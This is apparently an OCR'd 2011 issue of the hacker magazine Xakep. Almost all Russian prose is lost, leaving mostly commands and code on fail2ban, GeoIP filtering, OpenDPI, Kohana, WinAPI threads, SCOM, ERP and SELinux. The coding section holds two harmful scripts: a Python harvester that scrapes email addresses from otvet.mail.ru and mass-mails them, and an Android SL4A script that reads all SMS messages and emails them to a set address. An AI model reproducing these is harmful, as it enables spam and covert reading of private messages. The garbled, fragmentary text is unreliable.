$ fail2ban-regex /var/log/asterisk.log 'NOTICE.* .*:
Registration from '.*' failed for '' No matching
peer found'
,
asterisk.conf, filter.d.
, , . , ,
.
action.d.
DPI
Deep Packet Inspection (
) ,
,
. DPI-
OSI
:
(P2P, VoIP, online-,
, ),
;

(, P2P: BitTorrent, KaZaa,
eDonkey, Gnutella, MP2P, FastTrack);
,
,
(QoS);
(, ,
).
X 08 /151/ 2011
fail2ban

/, , ,
.
Fail2ban, /etc/bail2ban/
jail.conf.
.
$ sudo nano /etc/bail2ban/jail.conf
[DEFAULT]
// IP-, ,
DNS-
ignoreip = 127.0.0.1
// ,

bantime = 600
//
,
maxretry = 3
findtime = 600
HTTP://WWW
links
Fail2ban
fail2ban.org.
OpenDPI
opendpi.org, code.
google.com/p/opendpi.
Xtables-addons
xtables-addons.
sf.net.
[asterisk-iptables]
enabled = true
# filter action

filter = asterisk
action = iptables-allports[name=ASTERISK,
protocol=all]
sendmail-whois[name=ASTERISK, dest=root,
sender=fail2ban@example.org]
# Asterisk
logpath = /var/log/asterisk/messages
#
maxretry = 5
bantime = 6000
, :
$ sudo service iptables start
$ sudo service fail2ban start
Fail2ban , /var/
log/fail2ban.log iptables.
099
UNIXOID
fail2ban iptables

$ sudo iptables -L -v | grep fail2ban
Xtables-addons
patch-o-matic (-ng),
iptables, ,
Xtables-addons (xtables-addons.sf.net).
/ iptables.
,
. ,
CONFIG_NETFILTER_XTABLES :
$ grep -i xtables /boot/config-`uname -r`
CONFIG_NETFILTER_XTABLES=m
, . Ubuntu :
$ sudo apt-cache search xtables-addons
... : ,
.
$ sudo apt-get build-dep xtables-addons-common
, ,
, : ./configure; make; make install.
:
$ lsmod x_tables
.
20 . , ,
, man xtables-addons. .
IP- , ,
, . GeoIP /
. ,
. , /usr/
libexec/xtables-addons ( /usr/lib/xtables-addons). CSV
Perl:
$ cd /usr/libexec/xtables-addons/
$ sudo ./xt_geoip_dl
100
penDPI
$ sudo mkdir /usr/share/xt_geoip

$ sudo apt-get install libtext-csv-xs-perl
$ sudo ./xt_geoip_build -D /usr/share/xt_geoip *.csv
,
'--src-cc' (
), '--dst-cc' (). , iptables -m geoip help.
//
$ sudo iptables -A INPUT -m geoip \
--src-cc CN, TW, KR -j REJECT
//
$ sudo iptables -A INPUT -m geoip \
--src-cc A1 -j REJECT
// SSH
$ sudo iptables -A INPUT -p tcp dport 22 \
-m geoip ! src-cc RU -j REJECT
// ICMP
$ sudo iptables -A OUTPUT -p icmp -m geoip \
dst-cc ES -j REJECT
GeoIP, ,
- :
iptables -A INPUT -p tcp --dport 80 -m geoip \
--src-cc RU -j MARK --set-mark 1
, ,
IP-, .
,
.
TARPIT. : ,
( TCP
).
,
. , . , SSH- , 22. ,
:
$ sudo iptables -A INPUT -p tcp -m tcp \
-dport 22 -j TARPIT
, 22 , .
X 08 /151/ 2011
GeoIP
xtables-addons
$ patch -p0 < ../ipq_protocols.h.diff
:
DELUDE , ,
.
, , TARPIT DELUDE, CHAOS,
DROP ( ), TARPIT, DELUDE REJECT.
,
'--delude'/'--tarpit' /sys/modules/
xt_CHAOS/parameters.
IPP2P ,
, P2P-,
. P2P-, :
$ sudo iptables -A FORWARD -m ipp2p --ipp2p -j DROP
OpenDPI
, ,
. , , ICQ,
. , ,
80. ,
,
. iptables
, L7-filter
IPP2P. , OpenDPI (opendpi.org, code.google.com/p/opendpi).
LGPLv3, OpenDPI
PACE,
Ipoque. , PACE
-.
PACE OpenDPI: P2P, Skype, VoIP, IM,
, ( DPI ).
:
$ export OPENDPI_PATH=$(pwd)
. , (2.6.27-33), OpenDPI
.
. , clck.ru/
DWl8 2.6.35 ( LTS
Ubuntu). CONFIG_
NF_CONNTRACK_EVENTS CONFIG_NF_CT_NETLINK.
. Ubuntu
.config- /boot. . , opendpi-netfilter-wrapper, , :
$ cd ../wrapper
$ patch -p3 < ../opendpi-netfilter-wrapper-1.1_2.6.35_v3.patch
$ make
,
2.6.33. :
$ sudo make modules_install
$ sudo cp ipt/libxt_opendpi.so /lib/xtables
:
$ sudo modprobe xt_opendpi
, :
$ sudo iptables -m opendpi --help
( ipq_protocols_
osdpi.h) :
$ sudo apt-get install make gcc libpcap-dev
opendpi-1.2.0.tar.gz opendpi-netfilterwrapper-1.1.tar.gz,
, :
$
$
$
$
$
tar -xzf opendpi-netfilter-wrapper-1.1.tar.gz

cd opendpi-netfilter-wrapper-1.1
tar -xzf ../opendpi-1.2.0.tar.gz
cd opendpi-1.2.0
patch -p0 < ../ipq_main.h.diff
X 08 /151/ 2011
iptables -A FORWARD -m opendpi --bittorrent -j DROP
, ,
.
,
iptables,
. , , . z
101
CODING
Spider_NET (http://vr-online.ru)
WEB-

Kohana +
MVC = love
, web, ,
. 2011 , -
.

Content Management Framework.
CMF.
?
Content Management Framework (CMF)

(Content Management
System). CMS, ( )
, .
. CMS
, .
CMF
,
. CMF
:
1. . , .
2. . ,
. ,
, .

,
.
3. .
, CMF ( )
. ,
CMF, .
: , ,

. -
102

, .
, .
.
( , , ) .
. .
, , ,
.
.
() .
Model-View-Controller. ,
, , .
, .
,
. , , , Kohana

MVC.
MVC . ,
..

. , http://xakep.ru.
(
MVC). , .

.. .
X 08 /151/ 2011
- .
, , ,
.
.
.
MVC .
. ( ) . ,
, , .
- .
MVC .

- .
, ..
This is Kohana
Kohana . ,
, Kohana
Model View Controller.
Kohana -
PHP.
, Kohana BSD, GPL. ,
X 08 /151/ 2011

http://goo.gl/sRjoo
CodeIgniter. Kohana
. Kohana,
CodeIgniter. ,
.
http://kohanaframework.org/
Kohana. ,

.
.
http://vr-online.ru
. CMF,
CodeIgniter, Drupal
..
http://kerkness.ca/wiki/doku.php
Kohana.

, .
Kohana
DVD
dvd

.
WARNING
warning
,
MVC

.
!

.
. ,
.
Environment Tests ( ).
103
CODING

.
. , .
: Your environment passed all requirements. Remove or rename
the install.php file now.
,
install.php.
. ,
. , hello, world.
Hello world Kohana
, Hello world.
:
<?php defined('SYSPATH') or die('No direct script access.');
class Controller_Test extends Controller {
public function action_index()
{
$this->response->body('Hello world! Hello, everyone!!!');
}
}

Controller_Test, Controller.
. Controller ( ),
.
.
Test. App/
classes/controller App/classes/model.
, ,
. ,
. , ,
myFirstModel:
class Model_myFirstModel extends Model
{
public function calcIt (a, b) {
return a + b;
}
}
calcIt().
.
, ,
. ,
, Model_Database. ,
,
users.
:
class Model_myFirstDBModel extends Database_Model
{
public function selectData() {
return $this -> db -> query('select userName,
pass from users');
}
}
.
, , , .
, .
views,
.
Application. .
about. :
<html>
<head>
<title><?php echo $title ?></title>
</head>
..
,
html-.
, <title>.
. ,
.

:
$about_page = View::factory('about');
$about_page -> title = ' about';
$this -> response -> body ($about_page);
about_page about. View::factory.

title .
.
web. ,
, ..
(-
:) . .), - . ,
. ,
, .
, - .
, ,
. , Dropbox?
2 ,
.
.
, .
, :
.

. , , HTML5
Drag&Drop-
FileAPI.
DropBox. public.
. Dropbox
.
. , ,
.
.
, MVC
104
X 08 /151/ 2011
, , ( ) .
. ,
. ,
. . , ,
( ).
. ,
, .
:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title> CMF Kohana ][</title>
<link href="style.css" rel="stylesheet" type="text/css" />
X 08 /151/ 2011
<script src="html5uploader.js"></script>
</head>
<body onload="new uploader('drop', 'status', 'uploader.php',
'list');">
<div id="box">
<div id="status"> </div>
<div id="drop"></div>
</div>
<div id="list"></div>
</body>
</html>
html5uploader. JS-
html5-
. onload uploader.
:
105
CODING
: ORM
1. id , ;
2. id ;
3. ,
;
4. id .
. ,
html- style.css.
. , css-,
.
, Dropbox.
. . , ,
. .
. ,
DropboxUploader.
.

upload. DropBox :
$uploader = new DropboxUploader('_',
'_');
$uploader->upload(' ', ' ');
public,
/pupblic. ,
'/'.
:
if(count($_FILES)>0)
{
$uploader = new DropboxUploader('login', 'pass');
$uploader->upload(
106
$upload_folder.'/'.$_FILES['upload']['name'],
$dropbox_folder);
if(move_uploaded_file($_FILES['upload']['tmp_name'],
$upload_folder.'/'.$_FILES['upload']['name'] ) )
{
echo 'done';
$uploader = new DropboxUploader('login', 'pass');
$uploader->upload(
$upload_folder.'/'.$_FILES['upload']['name'],
$dropbox_folder);
}
exit();
}
...
$_FILES. ,

sendAsBinary().
base64 ( ). .
.
web ,
.
Kohana
. Kohana . ,

php. . ,
. z
X 08 /151/ 2011
>> coding
CODING
herfleisch (www.perechnev.com)
@MAIL.RU

mail.ru
( , ),
.
,
,
otvet.mail.ru.
.
, . ,
otvet.mail.ru.
-
.
, .
, ,
<ctrl+u> HTML- . , .
, ,
108
- mail-. :
, . ,
gedit .
Python.
. .
email- . urllib
- HTTP re
.
Python-:
X 08 /151/ 2011
INFO
info

100 .
-
,

-.
DVD
email
import urllib
import re
: web,
. :
while True:
u = urllib.urlopen("http://otvet.mail.ru/it/")
page = u.read()
emailPattern =
r"[0-9a-zA-Z_\-\.]+@[0-9a-z-A-Z\.]+.[a-zA-Z]+"
compiledPattern = re.compile(emailPattern)
for address in compiledPattern.findall(page):
# -
http://otvet.mail.ru/it/ ,
. , , email- , http://otvet.mail.ru/sport/.
emailPattern
, email-. ,

. Google

, :).

:
for address in compiledPattern.findall(page):

findall compiledPattern.
page,
. findall
email-,
http://otvet.mail.ru/it/.
, for <> in <>, , email-
X 08 /151/ 2011
, address
. ,
,
.
.
,
:
smtp_server = "smtp.mail.ru"
smtp_port = 25
smtp_address = "nickname@mail.ru"
smtp_password = "passw0rd"
mail_topic = " "
mail_body = ",
-. , ,
."

.
. -
:
import smtplib
from email.MIMEText import MIMEText
dvd

,
.
WARNING
warning

mail.
ru
.

.
forin, email:
msg = MIMEText(mail_body + address, "", "utf-8")
msg['From'] = smtp_address
msg['To'] = address
msg['Subject'] = email_topic
mailServer = smtplib.SMTP(smtp_server, smtp_port)
mailServer.login(smtp_address, smtp_password)
mailServer.sendmail(smtp_address, address,
msg.as_string())
mailServer.close()
usedEmails.append(address)
109
CODING
:)
: email ,
address.
. ,
.

, - .
20-25
. :
time.sleep(25)
:
import time
, .
,
. -
, 150 400 . !
http://otvet.mail.ru ,
.
19 998. 20
:).
, otvet.mail.ru
. ,
Google Yahoo , . , ,
,
email- , .
, ,
.
, - -
: ! , .
, :).
: my.mail.ru.
. , . z
110
X 08 /151/ 2011
>> coding

e1$m
CODING
Night Storm (nstorm90@gmail.com)
Scripting
Layer
for Android
SMS-
ANDROID
Scripting Layer for Android:

Android
. ,
.
Python Ruby! SL4A .
SL4A
Android. ,
: Python, Perl, JRuby, Lua, BeanShell,
JavaScript, Tcl. API,
Android,
.
,
. ,
, ,
-
112
. ,
. ,
alpha-,
. , ,
cellbots.com.
:
SL4A, - android-
. apk-
(. ), QR.
X 08 /151/ 2011
DVD
dvd

.
HTTP://WWW
links
QR- SL4A
:
http://code.google.
com/p/androidscripting/.
, , Add Python,
py,
:
import android
droid = android.Android()
Python
,
.
.
View Interpreters.
Shell ,
unix-.
,
, Add, . apk-.
Python, .
,
. Python for Android, ,
Install,
,
. , SL4A, ,
Python.
.
Hello world!
, Hello World ,
, .
( View
Interpreters), Python.
, ,
print "Hello world" ,
.

,
exit() .
X 08 /151/ 2011
, , : , ,
droid. :
print Hello world, hello
world alert- API.
:
import android
#
h = "hello world"
print h
# API
droid.dialogCreateAlert(h, h)
droid.dialogShow()
WARNING
warning

,

.

. DialogCreateAlert : .
makeToast (
).

-
, , ! ,
API browser,
. , , <Insert>.

. , , .
SMS-
, SMS
.
113
CODING
, -
# -*- coding: utf-8 -*import android, smtplib, os
#
mailfrom = " "
mailto = " "
lines = ""
#
result = droid.smsGetMessages(False)
#
for f in result[1]:
for value in f.values():
lines = lines+str(value.encode('utf-8'))+ '\n'
print lines
#
mailSend = smtplib.SMTP("smtp.gmail.com",587)
mailSend.ehlo()
mailSend.starttls()
mailSend.ehlo()
mailSend.login(mailfrom," ")
mailSend.sendmail(mailfrom, mailto, lines)
mailSend.close()
, .
. mailfrom
mailto ,
, .
smsGetMessages() .
,
114
Python
(True), (False). ,
, : inbox (
) ,
. result ,
. ,
. result, SMS
,
result[1], ,
SMS, ID .
,
, .
API SL4A sendEmail(),
, ,
SMS . smtplib
.
.
? , ,
,
. apk-
( : http://code.google.com/p/android-scripting/wiki/
SharingScripts), , :).
, API ( )
, . ,

, ! z
X 08 /151/ 2011
CODING
deeonis (deeonis@gmail.com)
C++, . C++ ,
. Windows ,
.
,
.

.
Windows,
(, , ..),
.
, ,
-
.
.
:

//
HANDLE hWorkerThread = ::CreateThread( ... );
// -
,
...
//
DWORD dwWaitResult = ::WaitForSingleObject(
hWorkerThread, INFINITE );
if( dwWaitResult != WAIT_OBJECT_0 )
{
//
}
//
::CloseHandle( hWorkerThread );
CreateThread,
, , , , . , API- WaitForSingleObject. .
WaitForSingleObject
WaitForMultipleObjects
WaitForSingleObject
,
. , .
, , -
116
. : . WaitForSingleObject
, ,
, , ,
.
, API
.
WAIT_TIMEOUT. , INFINITE.
,
, .
, ,
WAIT_OBJECT_0.
WaitForSingleObject , API- WaitForMultipleObjects,
.
.
DWORD WINAPI WaitForMultipleObjects(
__in DWORD nCount,
__in const HANDLE *lpHandles,
__in BOOL bWaitAll,
__in DWORD dwMilliseconds
);
API- WaitForSingleObject ,
.
const
HANDLE *lpHandles. DWORD nCount, BOOL bWaitAll
,
.

WaitForSingleObject, , bWaitAll == FALSE,

WAIT_OBJECT_0 + object_index_in_array. ,
WAIT_OBJECT_0, , .
, , WaitFor***, , .
(Events), , , , , ,
. , X 08 /151/ 2011
MSDN
, .
event . , ,
,
.
CreateEvent.
CreateEvent
HANDLE WINAPI CreateEvent(
__in_opt LPSECURITY_ATTRIBUTES lpEventAttributes,
__in BOOL bManualReset,
__in BOOL bInitialState,
__in_opt LPCTSTR lpName
);
.
BOOL bManualReset
FALSE.
WaitFor***
. bManualReset == TRUE,
ResetEvent.
.

, API OpenEvent.
events .
BOOL bInitialState.
TRUE, .
Events WaitFor***-
.
(mutex) event , ,
,
X 08 /151/ 2011
. ,
, . -
mutex
WaitFor***,
.
,
. , ,
mutex, ,
WaitFor*** , ,
.
,
WaitFor*** API ,
.
ReleaseMutex. mutex
. , ReleaseMutex
,
WaitFor***.
,
,
.
Mutex
HANDLE hMutex;
void Func()
{
::WaitForSingleObject(hMutex, INFINITE);
::ReleaseMutex(hMutex);
}
DWORD WINAPI thread1(LPVOID param)
{
HTTP://WWW
links
http://goo.gl/H2NLa
,
Windows,
.
Func();
117
CODING

}
{
...
}
int main(...)
{
hMutex = ::CreateMutex(NULL, FALSE, NULL);
HANDLE hThread1 = ::CreateThread(NULL, 0, thread1, ...);
HANDLE hThread2 = ::CreateThread(NULL, 0, thread2, ...);
}
thread1 WaitForSingleObject
. ,
WaitForSingleObject,
ReleaseMutex.
WaitFor*** , thread1
, . thread2, ,
.
, WaitForSingleObject
Func ,
,
.
(semaphore)
, . , ,
, semaphore . , WaitFor***-
, .
,
. semaphore API-
CreateSemaphore.
118
CreateSemaphore
HANDLE WINAPI CreateSemaphore(
__in_opt LPSECURITY_ATTRIBUTES lpSemaphoreAttributes,
__in LONG lInitialCount,
__in LONG lMaximumCount,
__in_opt LPCTSTR lpName
);
, ( LONG lMaximumCount)
(LONG
lInitialCount). ReleaseSemaphore ,
,
.
.
critical
section. API, WaitFor***.

.
critical section . API- InitializeCriticalSection.
,
CRITICAL_SECTION (
).
.
EnterCriticalSection CRITICAL_SECTION
, . LeaveCriticalSection
.
API , ,
. , , ,
, 100 .
, .
, EnterCriticalSection
. , X 08 /151/ 2011

( HKEY_LOCAL_
MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\
CriticalSectionTimeout). WINAPI EXCEPTION_POSSIBLE_DEADLOCK,
,
deadlock. , ,
null.
EnterCriticalSection TryEnterCriticalSection,
,
FALSE, critical section.
, , TRUE.
, ,
DeleteCriticalSection.
. , .
API-. API
Interlocked, :).
,
- .
.
,
. ,
,
, CPU .
Deadlock
.
, .
deadlock
{
::WaitForSingleObject(hEventA, INFINITE);
...
X 08 /151/ 2011
::WaitForSingleObject(hEventB, INFINITE);
...
}
{
::WaitForSingleObject(hEventB, INFINITE);
...
::WaitForSingleObject(hEventA, INFINITE);
...
}
, : A B.
,
A B, , ,
event B A. , .
,
WaitForMultipleObjects bWaitAll, TRUE,
A B .
. ,
, WaitForMultipleObjects.

,
. , ,
,
,
.
, , .
. , ,
,
, . z
119
SYN/ACK
grinder (grinder@tux.in.ua)
SCOM:
, . , (
) . , . , ,
.
SCOM
- Microsoft
System Center,
, . SCOM 2007 R2
(OpsMgr, System Center Operations Manager 2007 R2)
2005 (Microsoft Operations Manager).
,
,
Windows, Linux UNIX. SCOM

, . ,
, , , SQL-,
,
.
.
( System Center),
(Management Server).
,
. ,
SCOM ,
. ( RPC)

-.
, ,
10 60 . , (
) .
MS SQL Server (
7 ) (Datawarehouse, 1 ).
(Management
Group),
, workgroup
Windows. MG,
.
OpsMgr
OpsMgr, , (),
.
, PowerShell.
PS- -
120
. ,
System Center Central (systemcentercentral.com).
, ,
. SCOM
(Management Packs), . , , ,
(),
.
. MP
SCOM, .
MS.
MS, . , , SCOM
MS Forefront TMG, System Center Data Protection
Manager 2010 .

.
Management Packs SCOM
( systemcentercentral.com).
,
SNMP , SCOM.
, TechNet .
XML-.
, . XML
, , .
SCOM . (Reporting
Server), , .
OpsMgr
Audit Collection Services (ACS), .
SCOM ,
. SCOM 2007 R2, ,
, ,
Linux/Unix .
SCOM
, , ,
. ,
Next, X 08 /151/ 2011
SCOM 48 Management Pack

SCOM
, .
, , ,
- , OpsMgr Win2k8 ,
(R2 2009 ).
SCOM
(, .
.) .
(CPU
2,8 , RAM 4 ) Win2k3/2k8/R2, MS
SQL Server MS SQL Server (Reporting
Services) .
Web Server (IIS). : SCOM 2007 R2
MS SQL 2008 SP2 R2, SQL
2005 SP2 SQL 2008 SP1.
. DBCreateWizard.exe, . Database
. ,
(. support.microsoft.com/
kb/2425714). , , SQL-
, clck.ru/E17g.
clck.ru/DrGM,
Prerequisite Viewer,
, , .
, ,
IIS .
, , .
PowerShell :
X 08 /151/ 2011
> Import-Module ServerManager

> Add-WindowsFeature NET-Framework-Core,Web-Metabase,
Web-WMI,Web-Static-Content,Web-Default-Doc,Web-DirBrowsing,Web-Http-Errors,Web-Asp-Net,Web-Net-Ext,WebISAPI-Ext,Web-ISAPI-Filter,Web-Filtering,Web-WindowsAuth, Web-Mgmt-Console r
ASP.NET Ajax Extensions.

clck.ru/DwEY .
, WinXP/Vista/7.
Active
Directory ( , DNS, 2000).

Global- ,
.
, .
, OpsMgr, ,
OpsMgr .
,
. , SQL,
.
Management Server Action Account,
SDK and Config Service Account.
-. Windows , ;
- ,
.
. -
121
SYN/ACK
Prerecvisite Viewer
,
, . ,
,
.

(Datawarehouse Reporting Server), ACS ( ).
( 51908).
, .
, , Monitoring, Authoring, Administration,
Reporting My Workspace. .
, , My Workspace. . , .

. -
: Monitoring My Workspace ,
, .
PS ,
Get-OperationManagerCommand. ,
, :
PS> Get-managementServer
.
Monitoring Windows
Computer Operations Manager . Healthy.
.
Monitoring (alerts), , , ,
. , , ,
. Actions .
, .
. Required
Configuration Tasks -
122

.
, ,
.
, Active Directory, Configure Active
Directory (AD) Integration Optional Configuration.
, .

.
SCOM ( ,
..).
, Administration .

,
( ).
, ,
// ,
, , ,
.
Discovery
Wizard. , .
(Windows, Linux
), , (
).
. ( , ..),
, ,
Discovery.
(agent agentless) , , . ,
, ,
Pending Management. , ( ),
Agent Management,
.
60
, , ,
.
X 08 /151/ 2011
HTTP://WWW
links
SCOM
microsoft.com/
opsmgr.

SCOM technet.microsoft.com/opsmgr.
Microsoft,
SCOM
clck.ru/Du0j.
System
Center Central
systemcentercentral.
com.
INFO
SCOM
(Administration
Settings Heartbeat, )
,
(,
, ).
SCOM MS CEIP .
Client Monitoring Configuration,
Management
Server.
,
, ,
.
.
.
, SCOM , ,
. , . 50 ,
Administration
Management Pack.
. MP
,
,
Download Management Pack Import
Management Pack. SCOM
,
,
.
, X 08 /151/ 2011
.
Notifications Channel,
New : email, IM, SMS .
, . , email
SMTP- .
,
New Subscriber, , (
) .
, Subscriptions. , New
. , ,
.
, .

,
. ,
.
,
, ,
:).

,
-.

SCOM,
,
.
, , . z
info

System
Center Essentials.

OpsMgr, ,
System
Center ,
,

.
WARNING
warning
SCOM 2007 R2
SQL
2008 R2, SQL
2005 SP2 SQL 2008
SP1.

SQL- clck.
ru/E17g.
123
SYN/ACK
(polygaev@gmail.com)
ERP
!
ERP-: , OpenSource

ERP , . . , ERP-, .

1. ERP
ERP-

.
. ERP-
, - . , 1
1:
( ),
: ,
, -
. ,
.
1: .
1 20. ,
.
.
, ERP, . ,
ERP- SAP
, , ,
,
(, ..).
, .

( $1 , $100 . $1 , $100 .),
( $500 ,
$100 $500 , $100
) , ERP.
. ERP
.
, .
, , :
ERP.
,
, -
124
ERP-.
, , , . ,
,
. ,
.
. ,
,
.
.
2. ERP

ERP-
, .
2009 ( 2010 ), IDS, ERP-
2.
SAP,
1C, Oracle, Microsoft
.
,
.
, , ERP-, ,
.
,
.

.
.
(. 3), .
,
, , ..
SAP

SAP, - ,
( 18 )
X 08 /151/ 2011
- ERP-
ERP-.
: SAP Business One
SAP Business All-in-One.
SAP Business All-in-One -

, 2500 . SAP
Business One -
, 100 ( ,
).

ERP- SAP
: ,
, , ,
, , , ( ), .
(www.sap.com) ,
(. 4).
, SAP

: SAP SCM , SAP SRM
.

SAP: , , ,
,
, SAP
.
Oracle

-
X 08 /151/ 2011
Oracle.
.
Oracle ,
. , .
ERP- Oracle E-Business Suite. Oracle E-Business Suite .

. 12 .

: , ,
,
, ,
,
, ,
, ,
. , : , ,
-, - ,
.
ERP Oracle
ORACLES PEOPLESOFT ENTERPRISE.
.

ERP- : ,
, ,
,
, , -
125
SYN/ACK
1. ERP
:
SAP:
sap.com/cis/sme/solutions/businessmanagement/comparebm/
index.epx.
Oracle:
oracle.com/ru/products/applications/ebusiness/index.html.
Microsoft
microsoft.com/rus/dynamics/default.mspx.

frontstep.ru/products/SyteLine/InforERPSyteLine.

galaktika.ru.
1C
v8.1c.ru.
TADVISER
tadviser.ru.
. , , ,
, .
, .
Oracle
Oracles JD Edwards Enterprise One.

: , , ,
, ,
, , ,
, ,
, .
.

Oracle, ,
. , ERP
,
,
.

. ,
.
SAP, -
126
. 2. ERP (
IDC)

.
Microsoft

- Microsoft
Microsoft Business Solution.
ERP-
Microsoft , . , .
ERP software-
. Microsoft , ERP-. Microsoft Dynamics AX
Microsoft Dynamics NAV . ,
, , Microsoft Dynamics AX
for Retail. , SAP Oracle Microsoft, , .

, Microsoft
Dynamics AX, 5.

Microsoft Dynamics NAV (.
. 6).

Microsoft
. . , Microsoft
,
SAP Oracle. .
INFOR

, , INFOR.
, Gartner ERP- Infor ERP SyteLine
.

X 08 /151/ 2011
. 3. Garthner ERP
: ,
, ..
.
, (
?), , .
: ,
, , ,
.
,
INFOR: ,
,
.

INFOR
Microsoft.
,
. , .
.
ERP , .

ERP-,
ERP.
.
,
.
ERP- ,
.

ERP- ( ).
ERP- :
(Financial Management
FM), (Human
Capital Management HCM),
(Manufacturing Management MM), X 08 /151/ 2011
. 4. SAP Business
All-in-One .
(Project Management PM),
(Supply Chain Management SCM),
(Supplier Relationship
Management SRM), (Enterprise
Asset Management EAM), (),
(Customer
Relationship Management CRM) .
, , ERP: BI (Business
Intelligence), ,
, , ,
Excel.
:
, , , .

ERP-c
.
, ,
,
1C.
1C
1C . ,
.

. ,
: .
,
.
, 1C small-
middle-.
?

1C:
8 ( 1C). , , ,
SAP Oracle, , , Microsoft Dynamics NAV.
127
SYN/ACK
. 5. Microsoft Dynamics AX

1C ,
.
.

. ,
1C ,
ERP 1C .
?
Open Source
. 6. Microsoft Dynamics NAV
ERP- Open
Source-.
ERP . Open Source
.
,
-,
Open Source . .
, , ,
, ,
, ,
.
ERP-.
, Openbravo workflow . web-, Java.
, Java.
Openbravo ERP
Openbravo ERP- ,
. Open
Source-.
Openbravo Russia, .
web- .

: , ,
128
Openbravo , Linux Ubuntu,

Amazon Web Services.
Compiere

Compiere ERP-
. Compiere Open Source ERP-.
2008 InfoWorld Compiere Bossie
Award ERP-
.
X 08 /151/ 2011
. 7. -

ompiere : (Order Management),
(Procurement), (Material Management),
(Project Management),
(WMS Warehouse Management System),
(Manufacturing), (Cash Management),
( ),
(Performance Analysis), (Customer Relationship Management), (Work-flow Management), - (Web
Store).

Compiere : Community Edition
( ), Standard Edition, Professional Edition, Cloud
Edition ( , ,
). Community
Edition ERP- .

ERP-
, ERP.

:

, .

.
Solaris ERP

Solaris ERP ,

.
ERP.

, : ( , , ),
( ,
, , ,
, , ),
, ,
, , , , , ,
X 08 /151/ 2011
. 8. 1:

, (TASK-Manager).
, ERP-,
, ,
4-5 . , ,
:
1. . ,
ERP-.
, . , , ,
: ,
, , ,
, , .
2. .
3.
, , 7 .
4. 4-5
.
5.
.
6. . .
. , , ,
.
, ERP2.
, , :
1. , ERP-
.
2. , ,
ERP, , , , .
3. , ,
, . ,
, , . z
129
SYN/ACK
(execbit.ru)
SELinux:
!
SELinux ,
Linux , ,
. , , SELinux
, .
SELinux (Security-Enhanced Linux Linux )
.
Linux 2.6.0
Red Hat
Enterprise Linux 4. SELinux , Debian, OpenSUSE Ubuntu, , ,
.
SELinux- RHEL5, IBM,
EAL4 Augmented with ALC_FLR.3,
Trusted
Solaris. SELinux Linux, , ,
, ,
, , , . ,
,
, ( Fedora
SELinux ). .
UNIX , .
, (,
), -
. , -rwxr-xr-x, ,
( ) , , , ,
. ,
UNIX ,
( ) ,
(procfs sysfs). ,
. -, .

,
. , -
130
(cfdisk, )
, ,
,
root. ,
: /
,
.
,
(ioctl)? . -,
Linux
.
, ,
root, . ,
, FTP- 21
, root,
, root, FTP , ,
, . - ! SELinux
,
.

, , ,
,
, , .
,
, , RBAC, MCS .
, ][,
. SELinux
, . SELinux , ? :
1. () (, ..)
, ( ,
,
X 08 /151/ 2011
, SELinux).
2. -
, SELinux.
3. ,
( ),
.
4. ( ),
() , ,
. :
, initrc_t
( ,
), - Apache /usr/sbin/
httpd, httpd_exec_t. ,
SELinux, ()
, initrc_t

SELinux- unconfined_u,
,
,

,
(
SELinux).
,
:
# useradd -Z xguest_u _
,
Linux-:
# semanage login -m -S targeted -s "xguest_u" -r s0 __
default__
SELinux- :
# /usr/sbin/semanage login -l
X 08 /151/ 2011
httpd_exec_t, ,
httpd_t.
Apache, httpd_t.
SELinux, ,
, , httpd_t
, httpd_sys_content_t 80 , Apache
(
). :
? , ,

.
,
( 1,5
, FTP- ). SELinux
, , ,
(, audit2allow
SELinux - audit). ,

.

RBAC
, SELinux ,
,
, (,
,
SELinux). - ,
SELinux ,
.
SELinux,
. ()
, ( ,
): ,
( , _t).
SELinux (
Linux, Linux-
SELinux- unconfined_u) ,
, ,
131
SYN/ACK
SELinux
semanage login -l: c SELinux
, object_r,
system_u, unconfined_u, ,
.
, ,
/, SELinux (
, ).
ps xZ: c
, ,
.
UNIX,
. ,
, ,

,
( , ).
SELinux ,
(, ). Linux-, SELinux,
,
SELinux- . ,
Fedora RHEL (
, ,
) : system_u, system_r
unconfined_u, unconfined_r.
,
, system_u ( system_r)
(, httpd_t), (),
(, httpd_exec_t).
,
. unconfined_u unconfined_r
Linux-.
(
system_u:system_r:login_t),
/ . , ,
system_u:system_r:shell_t
SELinux ( ), PAM-
pam_selinux, SELinux,
( ) unconfine
d_u:unconfined_r:unconfined_t. ,
SELinux , , , ,
. , ,
SELinux-
system_u , ,
,
.
, -
132
SELinux ,
. ,
,
,
. ,
, SELinux.
SELinux, .
1. SELinux . SELinux , .
,
- ,
-
( , ).
2. -Z . , . , :
$ id -Z
$ ps auxZ
$ ls -Z
:
$ find /etc -context '*net_conf_t'
:
# restorecon -v /usr/sbin/httpd
,
:
# matchpathcon -V /var/www/html/*
3. mv ! , ,
, ,
(,
/etc, etc_t,
/var/www/html httpd_sys_content_t).
.
mv ,
(, Apache ,
httpd_sys_content_t).
4. . Fedora RHEL man-, SELinux
X 08 /151/ 2011
semanage port -l: c

SELinux selinuxfs
. ,
httpd_selinux(8) ,
Apache, ,
.
, , SELinux
. ,

- , SELinux
. ,
, -.
SELinux /var/log/audit/audit.
log. ,
,
. ,
,
. /var/log/messages,
:
# grep "SELinux is preventing" /var/log/messages
May 7 18:55:56 localhost setroubleshoot: SELinux is
preventing httpd (httpd_t) "getattr" to /var/www/
html/index.html (home_dir_t). For complete SELinux
messages. run sealert -l de7e30d6-5488-466d-a60692c9f40d316d
: SELinux
httpd_t (- Apache) /var/www/html/
index.html , (home_dir_t ,
). SELinux
sealert -l --. ,
, ,
, .
:
index.html mv,
, . .
chcon:
semanage boolean -l: c SELinux
, chcon
, restorecon,
/www default_t (
, , ).
:
# semanage fcontext -a -t httpd_sys_content_t /www
# restorecon -v /www
,
/www httpd_
sys_content_t, ,
( SELinux ,
,
semanage ).
semanage
-:
INFO
info
SELinux

UNIX,

,

.
# semanage boolean -l
-
, , , -
(httpd_can_network_connect_db) ftp
(ftp_home_dir) .. ,
.
/ ,
setsebool:
# setsebool httpd_can_network_connect_db on
# setsebool httpd_can_network_connect_db off
-P,
. semanage

SELinux :
WARNING
warning
tar

,

. --selinux
.
# semanage permissive -a httpd_t

# chcon -t httpd_sys_content_t \
/var/www/html/index.html

:
# restorecon -v /var/www/html
Apache ok.
,
Apache (, /www).
X 08 /151/ 2011
:
# semanage permissive -d httpd_t
SELinux , .
,
,
. z
133
PHREAKING
id (mk90.ru)
Shield- Arduino
Arduino ,
Open Hardware ,
.
:

.
?

$30. ATMEL USB-,
.
.
